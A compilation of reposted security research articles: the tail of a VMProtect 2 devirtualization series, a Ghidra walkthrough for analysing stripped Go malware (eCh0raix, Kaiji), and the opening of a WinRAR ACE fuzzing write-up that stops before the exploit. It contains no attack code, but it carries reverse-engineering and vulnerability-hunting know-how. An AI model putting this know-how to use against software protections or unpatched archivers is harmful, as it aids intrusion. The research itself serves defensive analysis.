This stage will do F^{-1}(e, o)F−1(e,o) and G^{-1}(e, o)G−1(e,o) for each virtual instruction operand of each label. Lastly, the relative virtual address from vm_entry to the first operand of the first virtual instruction is calculated and then encrypted using the inverse transformations used to decrypt the relative virtual address to the virtual instructions themselves. You can find more details about these transformations inside of the vm_entry section of the last article.

VMAssembler — Stage Four, C++ Header Generation


Stage four is the final stage of virtual instruction assembly. In this stage C++ code is generated. The code is completely self contained and environment agnostic. However, there are a few limitations to the current implementation. Most glaring is the need for a RWX (read, write, and executable) section. If one were to use this generated C++ code in a Windows kernel driver then the driver would not support HVCI systems. Also, as of 6/19/2021, MSVC cannot compile the generated header as for whatever reason, the static initializer for the raw module causes the compiler to hang. You must use clang-cl if you want to compile with the generated header file from VMAssembler.

VMAssembler — Example


Once a C++ header has been generated using VMAssembler you can now include it into your project and compile using any compiler that is not MSVC as the MSVC compiler for some reason cannot handle such a large static initializer which the protected binary is contained in, clang-cl handles it however. Each label that you define will be inserted into the vm::calls enum. The value for each enum entry is the encrypted relative virtual address to the virtual instructions of the label.

namespace vm
{
	enum class calls : u32
	{
		get_hello = 0xbffd6fa5,
		get_world = 0xbffd6f49,
	};
	
	//
	// ...
	//
	
    template < calls e_call, class T, class... Ts > auto call( const Ts... args ) -> T
    {
        static auto __init_result = gen_data.init();

        __vmcall_t vmcall = nullptr;
        for ( auto idx = 0u; idx < sizeof( call_map ) / sizeof( _pair_t< u8, calls > ); ++idx )
            if ( call_map[ idx ].second == e_call )
                vmcall = reinterpret_cast< __vmcall_t >( &gen_data.__vmcall_shell_code[ idx ] );

        return reinterpret_cast< T >( vmcall( args... ) );
    }
}

You can now call any label from your C++ code by simply specifying the vm::calls enum entry and the labels return type as templated params.

#include <iostream>
#include "test.hpp"

int main()
{
	const auto hello = vm::call< vm::calls::get_hello, vm::u64 >();
    const auto world = vm::call< vm::calls::get_world, vm::u64 >();
	std::printf( "> %s %s\n", ( char * )&hello, (char*)&world );
}

Output

> hello world

VTIL — Getting Started


The VTIL project as it currently stands on github has some untold requirements and dependencies which are not submoduled. I have created a fork of VTIL which submodule’s keystone and capstone, as well as describes the Visual Studios configurations that must be applied to a project which inherits VTIL. VTIL uses C++ 2020 features such as the concept keyword, thus the latest Visual Studios (2019) must be used, vs2017 is not supported. If you are compiling on a non-windows/non-visual studios environment you can ignore the last sentence.

git clone --recursive https://githacks.org/_xeroxz/vtil.git

Note: maybe this will become a branch in VTIL-Core, if so, you should refer to the official VTIL-Core repository if/when that happens.

Another requirement to compile VTIL is that you must define the NOMINMAX macro prior to any inclusion of Windows.h as std::numeric_limits has static member functions (max, and min). These static member function names are treated as min/max macros and thus cause compilation errors.

#define NOMAXMIN
#include <Windows.h>

The last requirement has to do with dynamic initializers causing stack overflows. In order for your compiled executable containing VTIL to not crash instantly you must increase the initial stack size. I set mine to 4MB just for precaution as I have a large amount of dynamic initializers in VMProfiler.

Linker->System->Stack Reserve Size/Stack Commit Size, set both to 4194304

VTIL — The Basic Block


vtil::optimizer::apply_all operates on the vtil::basic_block object which can be constructed by calling vtil::basic_block::begin. A vtil::basic_block contains a list of VTIL instructions which ends with a branching instruction or a vexit. To add a new basic block linking to existing basic block’s you can call vtil::basic_block::fork.

// Creates a new block connected to this block at the given vip, if already explored returns nullptr,
// should still be called if the caller knowns it is explored since this function creates the linkage.
//
basic_block* basic_block::fork( vip_t entry_vip )
{
    // Block cannot be forked before a branching instruction is hit.
    //
    fassert( is_complete() );

    // Caller must provide a valid virtual instruction pointer.
    //
    fassert( entry_vip != invalid_vip );

    // Invoke create block.
    //
    auto [blk, inserted] = owner->create_block( entry_vip, this );
    return inserted ? blk : nullptr;
}

Note: vtil::basic_block::fork will assert is_complete so ensure that your basic blocks end with a branching instruction prior to forking.

Once a basic block has been created, one can start appending VTIL instructions documented at https://docs.vtil.org/ to the basic block object. For every defined VTIL instruction a templated function is created using the “WRAP_LAZY” macro. You can now “emplace_back” any VTIL instruction with ease in your virtual machine handler lifters.

        // Generate lazy wrappers for every instruction.
        //
#define WRAP_LAZY(x)                                                     \
        template<typename... Tx>                                         \
        basic_block* x( Tx&&... operands )                               \
        {                                                                \
            emplace_back( &ins:: x, std::forward<Tx>( operands )... );   \
            return this;                                                 \
        }
        WRAP_LAZY( mov );    WRAP_LAZY( movsx );    WRAP_LAZY( str );    WRAP_LAZY( ldd );
        WRAP_LAZY( ifs );    WRAP_LAZY( neg );      WRAP_LAZY( add );    WRAP_LAZY( sub );
        WRAP_LAZY( div );    WRAP_LAZY( idiv );     WRAP_LAZY( mul );    WRAP_LAZY( imul );
        WRAP_LAZY( mulhi );  WRAP_LAZY( imulhi );   WRAP_LAZY( rem );    WRAP_LAZY( irem );
        WRAP_LAZY( popcnt ); WRAP_LAZY( bsf );      WRAP_LAZY( bsr );    WRAP_LAZY( bnot );   
        WRAP_LAZY( bshr );   WRAP_LAZY( bshl );     WRAP_LAZY( bxor );   WRAP_LAZY( bor );    
        WRAP_LAZY( band );   WRAP_LAZY( bror );     WRAP_LAZY( brol );   WRAP_LAZY( tg );     
        WRAP_LAZY( tge );    WRAP_LAZY( te );       WRAP_LAZY( tne );    WRAP_LAZY( tle );    
        WRAP_LAZY( tl );     WRAP_LAZY( tug );      WRAP_LAZY( tuge );   WRAP_LAZY( tule );   
        WRAP_LAZY( tul );    WRAP_LAZY( js );       WRAP_LAZY( jmp );    WRAP_LAZY( vexit );  
        WRAP_LAZY( vemit );  WRAP_LAZY( vxcall );   WRAP_LAZY( nop );    WRAP_LAZY( sfence );
        WRAP_LAZY( lfence ); WRAP_LAZY( vpinr );    WRAP_LAZY( vpinw );  WRAP_LAZY( vpinrm );   
        WRAP_LAZY( vpinwm );
#undef WRAP_LAZY

VTIL — VMProfiler Lifting


Take an example for the virtual machine handler lifter LCONSTQ. The lifter simply adds a VTIL push instruction which pushes a 64bit value onto the stack. Note the usage of vtil::operand to create a 64bit immediate value operand.

vm::lifters::lifter_t lconstq = {
    // push imm<N>
    vm::handler::LCONSTQ,
    []( vtil::basic_block *blk, vm::instrs::virt_instr_t *vinstr, vmp2::v3::code_block_t *code_blk ) {
        blk->push( vtil::operand( vinstr->operand.imm.u, 64 ) );
    } };

VMProfiler simply loops over all virtual instructions for a given block and applies lifters. Once all code blocks are exhausted, vtil::optimizer::apply_all is called. This is the climax of VTIL currently as some of these optimization passes are targeted toward stack machined based obfuscation. The purpose of submodeling VTIL in vmprofiler is for these optimizations as programming these myself would take months of research. Compiler optimization is a field of its own, interesting, but not something I have the time to pursue at the moment so VTIL will suffice.

Conclusion — Final Words and Future Work


Although I have done much work on VMProtect 2, the main success of my endeavors has truly been statically uncovering all virtual branches and producing a legible IL. Additionally doing all of this in a, well documentedopen source, C++ library which can be inherited further by other researchers. I would not consider the work I’ve done anything close to a “finished product” or something that could be presented as such, it is merely a step in the right direction for devirtualization. The last word of the last sentence leads me to my next point.

Devirtualization has been avoided throughout all of my documentation and articles pertaining to my VMProtect 2 work as to me this is something that has always been out of the scope of the project. Considering I’m a lone researcher, there are many aspects to the virtual machine architecture which could not be tackled by a single individual in a meaningful amount of time. For example, when an instruction is not virtualized by VMProtect 2, a vmexit happens and the original instruction is executed outside of the virtual machine. This means if I wanted to see an ENTIRE routine it would require me to follow code execution back out of the virtual machine and thus VMEmu would need many more months of development to support such a thing. The way that I have programmed these projects allows for multiple engineers working on the code base at a given time, except there seems to be little to no interest in open source development of these tools, even with such detailed documentation everyone wants to “make their own solution”, which is understandable, but not productive in the long run.

Additionally, devirtualization requires converting back to native x86_64. In order to do this, every single virtual machine handler must be profiled, every single virtual machine handler must have a VTIL lifter defined for it, and every single VTIL instruction must be mapped to a native instruction. At least this is what seems to be required with the level of knowledge I currently have, there may well be a much more elegant way of going about this that I am simply oblivious to at this time. Thus my conclusion to devirtualization: it is not a job for a single person, thus the goal of my project(s) has never been devirtualization, it’s always been an IL view of the virtual instructions with VTIL providing deobfuscation pseudo code. The IL alone is enough for a dedicated individual to begin research, the VTIL pseudo code makes it easier for the rest of us. VMProfiler Qt combined with IDA Pro as it currently exists can be used to analyze binaries protected with VMProtect 2. It may not be a beginner friendly solution, but in my opinion, it will suffice.

I must note that it is not a far stretch of the mind to assume private entities have well rounded solutions for VMProtect 2. I can imagine what a team of individuals, much more skilled than myself, working on devirtualization day in and day out would produce. On top of this, considering the length of time VMProtect 2 has been public, there has been ample time for these private entities to create such tools.

Conclusion — Future Work


Lastly, during my research of VMProtect 2, there has been a subtle urge to reimplement some of the obfuscation and virtual machine features myself in an open source manner to better convey the features of VMProtect 2. However, after much thought, it would be more productive to create an obfuscation framework that would allow for these ideas to be created with relative ease. A framework that would handle code analysis as well as file format parsing, deconstruction, and reconstruction. Something that is lower level than an LLVM optimization pass, but high enough level that a programmer using this framework would only need to write the obfuscation algorithms themselves and would not have to even know the underlying file format. This framework would only support a single ISA, which would be x86. The details beyond this point are still being contemplated at: https://githacks.org/llo/

Reverse Engineering Go Binaries with Ghidra

Reverse Engineering Go Binaries with Ghidra

Original text by Dorka Palotay

Go (also called Golang) is an open source programming language designed by Google in 2007 and made available to the public in 2012. It gained popularity among developers over the years, but it’s not always used for good purposes. As it often happens, it attracts the attention of malware developers as well.

Using Go is a tempting choice for malware developers because it supports cross-compiling to run binaries on various operating systems. Compiling the same code for all major platforms (Windows, Linux, macOS) make the attacker’s life much easier, as they don’t have to develop and maintain different codebases for each target environment.

The Need to Reverse Engineer Go Binaries

Some features of the Go programming language give reverse engineers a hard time when investigating Go binaries. Reverse engineering tools (e.g. disassemblers) can do a great job analyzing binaries that are written in more popular languages (e.g. C, C++, .NET), but Go creates new challenges that make the analysis more cumbersome.

Go binaries are usually statically linked, which means that all of the necessary libraries are included in the compiled binary. This results in large binaries, which make malware distribution more difficult for the attackers. On the other hand, some security products also have issues handling large files. That means large binaries can help malware avoid detection. The other advantage of statically linked binaries for the attackers is that the malware can run on the target systems without dependency issues.

As we saw a continuous growth of malware written in Go and expect more malware families to emerge, we decided to dive deeper into the Go programming language and enhance our toolset to become more effective in investigating Go malware.

In this article, I will discuss two difficulties that reverse engineers face during Go binary analysis and show how we solve them.

Ghidra is an open source reverse engineering tool developed by the National Security Agency, which we frequently use for static malware analysis. It is possible to create custom scripts and plugins for Ghidra to provide specific functionalities that researchers need. We used this feature of Ghidra and created custom scripts to aid our Go binary analysis.

The topics discussed in this article were presented at the Hacktivity2020 online conference. The slides and other materials are available in our Github repository.

Lost Function Names in Stripped Binaries

The first issue is not specific to Go binaries, but stripped binaries in general. Compiled executable files can contain debug symbols which make debugging and analysis easier. When analysts reverse engineer a program that was compiled with debugging information, they can see not only memory addresses, but also the names of the routines and variables. However, malware authors usually compile files without this information, creating so-called stripped binaries. They do this to reduce the size of the file and make reverse engineering more difficult. When working with stripped binaries, analysts cannot rely on the function names to help them find their way around the code. With statically linked Go binaries, where all the necessary libraries are included, the analysis can slow down significantly.

To illustrate this issue, we used simple “Hello Hacktivity” examples written in C[1] and Go[2] for comparison and compiled them to stripped binaries. Note the size difference between the two executables.

c and go comparison executables

Ghidra’s Functions window lists all functions defined within the binaries. In the non-stripped versions function names are nicely visible and are of great help for reverse engineers.Ghidra functions list

Figure 1 – hello_c[3] function listghidra functions list golang

Figure 2 – hello_go[5] function list

The function lists for stripped binaries look like the following:ghidra functions list c stripped binary

Figure 3 – hello_c_strip[4] function listghidra functions list go stripped binary

Figure 4 – hello_go_strip[6] function list

These examples neatly show that even a simple “hello world” Go binary is huge, having more than a thousand functions. And in the stripped version reverse engineers cannot rely on the function names to aid their analysis.

Note: Due to stripping, not only did the function names disappear, but Ghidra also recognized only 1,139 functions of the 1,790 defined functions.

We were interested in whether there was a way to recover the function names within stripped binaries. First, we ran a simple string search to check if the function names were still available within the binaries. In the C example we looked for the function “main”, while in the Go example it was “main.main”.searching for main function

Figure 5 – hello_c[3] strings – “main” was found

Figure 6 – hello_c_strip[4] strings – “main” was not foundsearching for main.main function in go binary

Figure 7 – hello_go[5] strings – “main.main” was found

Figure 8 – hello_go_strip[6] strings – “main.main” was found

The strings utility could not find the function name in the stripped C binary[4], but “main.main” was still available in the Go version[6]. This discovery gave us some hope that function name recovery could be possible in stripped Go binaries.

Loading the binary[6] to Ghidra and searching for the “main.main” string will show its exact location. As you can be seen in the image below, the function name string is located within the .gopclntab section.ghidra main.main string go binary

Figure 9 – hello_go_strip[6] main.main string in Ghidra

The pclntab structure is available since Go 1.2 and nicely documented. The structure starts with a magic value followed by information about the architecture. Then the function symbol table holds information about the functions within the binary. The address of the entry point of each function is followed by a function metadata table.

pclntab structure go string

The function metadata table, among other important information, stores an offset to the function name.

It is possible to recover the function names by using this information. Our team created a script (go_func.py) for Ghidra to recover function names in stripped Go ELF files by executing the following steps:

  • Locates the pclntab structure
  • Extracts the function addresses
  • Finds function name offsets

Executing our script not only restores the function names, but it also defines previously unrecognized functions.defining undefined strings in go binary with ghidra

Figure 10 – hello_go_strip[6] function list after executing go_func.py

To see a real-world example let’s look at an eCh0raix ransomware sample[9]:ghidra ech0raix function list

Figure 11 – eCh0raix[9] function list

Figure 12 – eCh0raix[9] function list after executing go_func.py

This example clearly shows how much help the function name recovery script can be during reverse engineering. Analysts can assume that they are dealing with ransomware just by looking at the function names.

Note: There is no specific section for the pclntab structure in Windows Go binaries, and researchers need to explicitly search for the fields of this structure (e.g. magic value, possible field values). For macOS, the _gopclntab section is available, similar to .gopclntab in Linux binaries.

Challenges: Undefined Function Name Strings

If a function name string is not defined by Ghidra, then the function name recovery script will fail to rename that specific function, since it cannot find the function name string at the given location. To overcome this issue our script always checks if a defined data type is located at the function name address and, if not, tries to define a string data type at the given address before renaming a function.

In the example below, the function name string “log.New” is not defined in an eCh0raix ransomware sample[9], so the corresponding function cannot be renamed without creating a string first.

Figure 13 – eCh0raix[9] log.New function name undefined

Figure 14 – eCh0raix[9] log.New function couldn’t be renamed

The following lines in our script solve this issue:

Figure 15 – go_func.py

Unrecognized Strings in Go Binaries

The second issue that our scripts are solving is related to strings within Go binaries. Let’s turn back to the “Hello Hacktivity” examples and take a look at the defined strings within Ghidra.

70 strings are defined in the C binary[3], with “Hello, Hacktivity!” among them. Meanwhile, the Go binary[5] includes 6,540 strings, but searching for “hacktivity” gives no result. Such a high number of strings already makes it hard for reverse engineers to find the relevant ones, but, in this case, the string that we expected to find was not even recognized by Ghidra.start reverse engineering go binary with ghidra

Figure 16 – hello_c[3] defined strings with “Hello, Hacktivity!”

Figure 17 – hello_go[5] defined strings without “hacktivity”

To understand this problem, you need to know what a string is in Go. Unlike in C-like languages, where strings are sequences of characters terminated with a null character, strings in Go are sequences of bytes with a fixed length. Strings are Go-specific structures, built up by a pointer to the location of the string and an integer, which is the length of the string.

These strings are stored within Go binaries as a large string blob, which consists of the concatenation of the strings without null characters between them. So, while searching for “Hacktivity” using strings and grep gives the expected result in C, it returns a huge string blob containing “hacktivity” in Go.

Figure 18 – hello_c[3] string search for “Hacktivity”golang string blob

Figure 19 – hello_go[5] string search for “hacktivity”

Since strings are defined differently in Go, and the results referencing them within the assembly code are also different from the usual C-like solutions, Ghidra has a hard time with strings within Go binaries.

The string structure can be allocated in many different ways, it can be created statically or dynamically during runtime, it varies within different architectures and might even have multiple solutions within the same architecture. To solve this issue, our team created two scripts to help with identifying strings.

Dynamically Allocating String Structures

In the first case, string structures are created during runtime. A sequence of assembly instructions is responsible for setting up the structure before a string operation. Due to the different instruction sets, structure varies between architectures. Let’s go through a couple of use cases and show the instruction sequences that our script (find_dynamic_strings.py) looks for.

Dynamically Allocating String Structures for x86

First, let’s start with the “Hello Hacktivity” example[5].dynamically allocating string structures in x86

Figure 20 – hello_go[5] dynamic allocation of string structure

Figure 21 – hello_go[5] undefined “hello, hacktivity” string

After running the script, the code looks like this:

Figure 22 – hello_go[5] dynamic allocation of string structure after executing find_dynamic_strings.py

The string is defined:

Figure 23 – hello_go[5] defined “hello hacktivity” string

And “hacktivity” can be found in the Defined Strings view in Ghidra:defined strings golang binary ghidra

Figure 24 – hello_go[5] defined strings with “hacktivity”

The script looks for the following instruction sequences in 32-bit and 64-bit x86 binaries:

Figure 25 – eCh0raix[9] dynamic allocation of string structure

Figure 26 – hello_go[5] dynamic allocation of string structure

ARM Architecture and Dynamic String Allocation

For the 32-bit ARM architecture, I use the eCh0raix ransomware sample[10] to illustrate string recovery.ARM architecture and dynamic string allocation ech0raix

Figure 27 – eCh0raix[10] dynamic allocation of string structure

Figure 28 – eCh0raix[10] pointer to string address

Figure 29 – eCh0raix[10] undefined string

After executing the script, the code looks like this:

Figure 30 – eCh0raix[10] dynamic allocation of string structure after executing find_dynamic_strings.py

The pointer is renamed, and the string is defined:

Figure 31 – eCh0raix[10] pointer to string address after executing find_dynamic_strings.py

Figure 32 – eCh0raix[10] defined string after executing find_dynamic_strings.py

The script looks for the following instruction sequence in 32-bit ARM binaries:

For the 64-bit ARM architecture, let’s use a Kaiji sample[12] to illustrate string recovery. Here, the code uses two instruction sequences that only vary in one sequence.ARM dynamic string allocation Kaiji

Figure 33 – Kaiji[12] dynamic allocation of string structure

After executing the script, the code looks like this:

Figure 34 – Kaiji[12] dynamic allocation of string structure after executing find_dynamic_strings.py

The strings are defined:

Figure 35 – Kaiji[12] defined strings after executing find_dynamic_strings.py

The script looks for the following instruction sequences in 64-bit ARM binaries:

As you can see, a script can recover dynamically allocated string structures. This helps reverse engineers read the assembly code or look for interesting strings within the Defined String view in Ghidra.

Challenges for This Approach

The biggest drawback of this approach is that each architecture (and even different solutions within the same architecture) requires a new branch to be added to the script. Also, it is very easy to evade these predefined instruction sets. In the example below, where the length of the string is moved to an earlier register in a Kaiji 64-bit ARM malware sample[12], the script does not expect this and will therefore miss this string.

Figure 36 – Kaiji[12] dynamic allocation of string structure in an unusual way

Figure 37 – Kaiji[12] an undefined string

Statically Allocated String Structures

In this next case, our script (find_static_strings.py) looks for string structures that are statically allocated. This means that the string pointer is followed by the string length within the data section of the code.

This is how it looks in the x86 eCh0raix ransomware sample[9].statistically allocating string structures

Figure 38 – eCh0raix[9] static allocation of string structures

In the image above, string pointers are followed by string length values, however, Ghidra couldn’t recognize the addresses or the integer data types, except for the first pointer, which is directly referenced in the code.

Figure 39 – eCh0raix[9] string pointer

Undefined strings can be found by following the string addresses.

Figure 40 – eCh0raix[9] undefined strings

After executing the script, string addresses will be defined, along with the string length values and the strings themselves.

Figure 41 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Figure 42 – eCh0raix[9] defined strings after executing find_static_strings.py

Challenges: Eliminating False Positives and Missing Strings

We want to eliminate false positives, which is why we:

  • Limit the string length
  • Search for printable characters
  • Search in data sections of the binaries

Obviously, strings can easily slip through as a result of these limitations. If you use the script, feel free to experiment, change the values, and find the best settings for your analysis. The following lines in the code are responsible for the length and character set limitations:

Figure 43 – find_static_strings.py

Figure 44 – find_static_strings.py

Further Challenges in String Recovery

Ghidra’s auto analysis might falsely identify certain data types. If this happens, our script will fail to create the correct data at that specific location. To overcome this issue the incorrect data type has to be removed first, and then the new one can be created.

For example, let’s take a look at the eCh0riax ransomware[9] with statically allocated string structures.string structure recovery statistic allocation

Figure 45 – eCh0raix[9] static allocation of string structures

Here the addresses are correctly identified, however, the string length values (supposed to be integer data types) are falsely defined as undefined4 values.

The following lines in our script are responsible for removing the incorrect data types:

Figure 46 – find_static_strings.py

After executing the script, all data types are correctly identified and the strings are defined.

Figure 47 – eCh0raix[9] static allocation of string structures after executing find_static_strings.py

Another issue comes from the fact that strings are concatenated and stored as a large string blob in Go binaries. In some cases, Ghidra defines a whole blob as a single string. These can be identified by the high number of offcut references. Offcut references are references to certain parts of the defined string, not the address where the string starts, but rather a place inside the string.

The example below is from an ARM Kaiji sample[12].

Figure 48 – Kaiji[12] falsely defined string in Ghidrafalsely defined string Kaiji reverse engineering go binary with ghidra

Figure 49 – Kaiji[12] offcut references of a falsely defined string

To find falsely defined strings, one can use the Defined Strings window in Ghidra and sort the strings by offcut reference count. Large strings with numerous offcut references can be undefined manually before executing the string recovery scripts. This way the scripts can successfully create the correct string data types.offcut reference ghidra

Figure 50 – Kaiji[12] defined strings

Lastly, we will show an issue in the Ghidra Decompile view. Once a string is successfully defined either manually or by one of our scripts, it will be nicely visible in the listing view of Ghidra, helping reverse engineers read the assembly code. However, the Decompiler view in Ghidra cannot handle fixed-length strings correctly and, regardless of the length of the string, it will display everything until it finds a null character. Luckily, this issue will be solved in the next release of Ghidra (9.2).

This is how the issue looks with the eCh0raix sample[9].

Figure 51 – eCh0raix[9] defined string in listing viewghidra decompile view ech0raix defined string

Figure 52 – eCh0raix[9] defined string in Decompile view

Future Work with Reverse Engineering Go

This article focused on the solutions for two issues within Go binaries to help reverse engineers use Ghidra and statically analyze malware written in Go. We discussed how to recover function names in stripped Go binaries and proposed several solutions for defining strings within Ghidra. The scripts that we created and the files we used for the examples in this article are publicly available, and the links can be found below.

This is just the tip of the iceberg when it comes to the possibilities for Go reverse engineering. As a next step, we are planning to dive deeper into Go function call conventions and the type system.

In Go binaries arguments and return values are passed to functions by using the stack, not the registers. Ghidra currently has a hard time correctly detecting these. Helping Ghidra to support Go’s calling convention will help reverse engineers understand the purpose of the analyzed functions.

Another interesting topic is the types within Go binaries. Just as we’ve shown by extracting function names from the investigated files, Go binaries also store information about the types used. Recovering these types can be a great help for reverse engineering. In the example below, we recovered the main.Info structure in an eCh0raix ransomware sample[9]. This structure tells us what information the malware is expecting from the C2 server.reverse engineering go binary with ghidra

Figure 53 – eCh0raix[9] main.info structure

Figure 54 – eCh0raix[9] main.info fields

Figure 55 – eCh0raix[9] main.info structure

As you can see, there are still many interesting areas to discover within Go binaries from a reverse engineering point of view. Stay tuned for our next write-up.

Github repository with scripts and additional materials

Files used for the research

File nameSHA-256
[1]hello.cab84ee5bcc6507d870fdbb6597bed13f858bbe322dc566522723fd8669a6d073
[2]hello.go2f6f6b83179a239c5ed63cccf5082d0336b9a86ed93dcf0e03634c8e1ba8389b
[3]hello_cefe3a095cea591fe9f36b6dd8f67bd8e043c92678f479582f61aabf5428e4fc4
[4]hello_c_strip95bca2d8795243af30c3c00922240d85385ee2c6e161d242ec37fa986b423726
[5]hello_go4d18f9824fe6c1ce28f93af6d12bdb290633905a34678009505d216bf744ecb3
[6]hello_go_strip45a338dfddf59b3fd229ddd5822bc44e0d4a036f570b7eaa8a32958222af2be2
[7]hello_go.exe5ab9ab9ca2abf03199516285b4fc81e2884342211bf0b88b7684f87e61538c4d
[8]hello_go_strip.execa487812de31a5b74b3e43f399cb58d6bd6d8c422a4009788f22ed4bd4fd936c
[9]eCh0raix – x86154dea7cace3d58c0ceccb5a3b8d7e0347674a0e76daffa9fa53578c036d9357
[10]eCh0raix – ARM3d7ebe73319a3435293838296fbb86c2e920fd0ccc9169285cc2c4d7fa3f120d
[11]Kaiji – x86_64f4a64ab3ffc0b4a94fd07a55565f24915b7a1aaec58454df5e47d8f8a2eec22a
[12]Kaiji – ARM3e68118ad46b9eb64063b259fca5f6682c5c2cb18fd9a4e7d97969226b2e6fb4

References and further reading

Solutions by other researchers for various tools

IDA Pro

radare2 / Cutter

Binary Ninja

Ghidra

Extracting a 19 Year Old Code Execution from WinRAR

Original text by Nadav Grossman

Introduction

In this article, we tell the story of how we found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim’s computer. The exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.

Background

A few months ago, our team built a multi-processor fuzzing lab and started to fuzz binaries for Windows environments using the WinAFL fuzzer. After the good results we got from our Adobe Research, we decided to expand our fuzzing efforts and started to fuzz WinRAR too.

One of the crashes produced by the fuzzer led us to an old, dated dynamic link library (dll) that was compiled back in 2006 without a protection mechanism (like ASLR, DEP, etc.) and is used by WinRAR.

We turned our focus and fuzzer to this “low hanging fruit” dll, and looked for a memory corruption bug that would hopefully lead to Remote Code Execution.
However, the fuzzer produced a test case with “weird” behavior. After researching this behavior, we found a logical bug: Absolute Path Traversal. From this point on it was simple to leverage this vulnerability to a remote code execution.

Perhaps it’s also worth mentioning that a substantial amount of money in various bug bounty programs is offered for these types of vulnerabilities.

Figure 1: Zerodium tweet on purchasing WinRAR vulnerability.

What is WinRAR?

WinRAR is a trialware file archiver utility for Windows which can create and view archives in RAR or ZIP file formats and unpack numerous archive file formats.

According to the WinRAR website, over 500 million users worldwide make WinRAR the world’s most popular compression tool today.

This is what the GUI looks like:

Figure 2: WinRAR GUI.

The Fuzzing Process Background

These are the steps taken to start fuzzing WinRAR:

  1. Creation of an internal harness inside the WinRAR main function which enables us to fuzz any archive type, without stitching a specific harness for each format. This is done by patching the WinRAR executable.
  2. Eliminate GUI elements such as message boxes and dialogs which require user interaction. This is also done by patching the WinRAR executable.
    There are some message boxes that pop up even in CLI mode of WinRAR.
  3. Use a giant corpus from an interesting piece of research conducted around 2005 by the University of Oulu.
  4. Fuzz the program with WinAFL using WinRAR command line switches. These force WinRAR to parse the “broken archive” and also set default passwords (“-p” for password and “-kb” for keep broken extracted files). We found those options in a WinRAR manual/help file.

After a short time of fuzzing, we found several crashes in the extraction of several archive formats such as RAR, LZH and ACE that were caused by a memory corruption vulnerability such as Out-of-Bounds Write. The exploitation of these vulnerabilities, though, is not trivial because the primitives supplied limited control over the overwritten buffer.

However, a crash related to the parsing of the ACE format caught our eye. We found that WinRAR uses a dll named unacev2.dll for parsing ACE archives. A quick look at this dll revealed that it’s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn’t even need to bypass them.

Build a Specific Harness

We decided to focus on this dll because it looked like it would be quick and easy to exploit.

Also, as far as WinRAR is concerned, as long as the archive file has a .rar extension, it would handle it according to the file’s magic bytes, in our case – the ACE format.

To improve the fuzzer performance, and to increase the coverage only on the relevant dll, we created a specific harness for unacev2.dll .

To do that, we need to understand how unacev2.dll is used. After reverse engineering the code calling unacev2.dll for ACE archive extraction, we found that two exported functions should be called for extraction in the following order:

  1. An initialization function named ACEInitDll, with the following signature:
    INT __stdcall ACEInitDll(unknown_struct_1 *struct_1);
    • struct_1: pointer to an unknown struct
  2. An extraction function named ACEExtract , with the following signature:
    INT __stdcall ACEExtract(LPSTR ArchiveName, unknown_struct_2 *struct_2);
    ArchiveName: string pointer to the path to the ace file to be extracted
    struct_2: pointer to an unknown struct

Both of these functions required structs that are unknown to us. We had two options to try to understand the unknown struct: reversing and debugging WinRAR, or trying to find an open source project that uses those structs.

The first option is more time consuming, so we opted to try the second one. We searched github.com for the exported function ACEInitDll
and found a project named FarManager that uses this dll and includes a detailed header file for the unknown structs.
Note: The creator of this project is also the creator of WinRAR.

After loading the header files to IDA, it was much easier to understand the previously “unknown structs” to both functions (ACEInitDll and ACEExtract ),  as IDA displayed the correct name and type for each struct member.

From the headers we found in the FarManager project, we came up with the following signature:

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

INT __stdcall ACEExtract(LPSTR ArchiveName, pACEExtractStruc Extract);

To mimic the way that WinRAR uses unacev2.dll , we assigned the same struct member just as WinRAR did.

We started to fuzz this specific harness, but we didn’t find new crashes and the coverage did not expand in the first few hours of the fuzzing. We tried to understand the reason for this limitation.

We started by looking for information about the ACE archive format.

Understanding the ACE Format

We didn’t find a RFC for that format, but we did find vital information over the internet.

1. Creating an ACE archive is protected by a patent. The only software that is allowed to create an ACE archive is WinACE. The last version of this program was compiled in November 2007. The company’s website has been down since August 2017. However, extracting an ACE archive is not protected by a patent.

2. A pure Python project named acefile is mentioned in this Wikipedia page. Its most useful features are:

  • It can extract an ACE archive.
  • It contains a brief explanation about the ACE file format.
  • It has a very helpful feature that prints the file format header with an explanation.

To understand the ACE file format, let’s create a simple .txt file (named “simple_file.txt”), and compress it using WinACE. We will then check the headers of the ACE file using acefile .

This is simple_file.txt

Figure 3: File before compression.

These are the options we selected in WinACEto create our example:

Figure 4: WinACE compression GUI.

This option creates the subdirectories \users\nadavgr\Documents under the chosen extraction directory and extracts simple_file.txt to that relative path.

simple_file.ace

Figure 5: The simple_file.ace produced using WinACE’s “store” compression option for visibility.

Running acefile.py from the acefile project using headers flags displays information about the archive headers:

Figure 6: Parsing ACE file header using acefile.py.

This results in:

Figure 7: acefile.py header parsing output.

Notes:

  • Consider each “\\” from the filename field in the image above as a single slash “\”, this is just python escaping.
  • For clarity, the same fields are marked with the same color in the hex dump and in the output fromacefile.

Summary of the important fields:

  • hdr_crc (marked in pink):
    Two CRC fields are present in 2 headers. If the CRC doesn’t match the data, the extraction
    is interrupted. This is the reason why the fuzzer didn’t find more paths (expand its coverage).To “solve” this issue we patched all the CRC* checks in unacev2.dll .*Note – The CRC is a modified implementation of the regular CRC-32.
  • filename (marked in green):
    It contains the relative path to the file. All the directories specified in the relative path are created during the extracting process (including the file). The size of the filename is defined by 2 bytes (little endian) marked by a black frame in the hex dump.
  • advert (marked in yellow)
    The advert field is automatically added by WinACE, during the creation of an ACE archive, if the archive is created using an unregistered version of WinACE.
  • file content:
    • origsize ” – The content’s size. The content itself is positioned after the header that defines the file (“hdr_type” field == 1).
    • hdr_size ” – The header size. Marked by a gray frame in the hex dump.
    • At offset 70 (0x46) from the second header, we can find our file content: “Hello From Check Point!”

Because the filename field contains the relative path to the file, we did some manual modification attempts to the field to see if it is vulnerable to “Path Traversal.”
For example, we added the trivial path traversal gadget “\..\” to the filename field and more complex “Path Traversal” tricks as well, but without success.

After patching all the structure checks, such as the CRC validation, we once again activated our fuzzer. After a short time of fuzzing, we entered the main fuzzing directory and found something odd. But let’s first describe our fuzzing machine for some necessary background.

The Fuzzing Machine

To increase the fuzzer performance and to prevent an I\O bottleneck, we used a RAM disk drive that uses the ImDisk toolkit on the fuzzing machine.

